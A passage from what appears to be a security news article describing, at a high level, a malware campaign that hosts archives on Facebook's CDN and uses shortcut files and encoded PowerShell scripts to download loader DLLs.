The previous attacks that used Google and Dropbox URLs were documented by Palo Alto’s Brad Duncan in a July write-up, and are almost identical to the ones detected last week by security researcher MalwareHunter.
The group uses Facebook’s CDN because the domain is trusted by most security solutions and there are low chances of having it blocked, compared to hosting malware on domains rarely active inside a business network.
Users who click on the link will download an RAR or ZIP file. These archives contain a link file (shortcut).
If users click on the link file, the shortcut path invokes a legitimate application installed on most windows PC — such as Command Prompt or PowerShell — to run an encoded PowerShell script. This technique of using local applications to hide malicious operations is known as “Squiblydoo,” and its purpose is to bypass lower-end security software.
From this point on, the encoded PowerShell script downloads and runs another PowerShell script that starts a storm of operations. The second PowerShell script downloads a loader DLL file, which in turn downloads a legitimate EXE file and a second DLL.
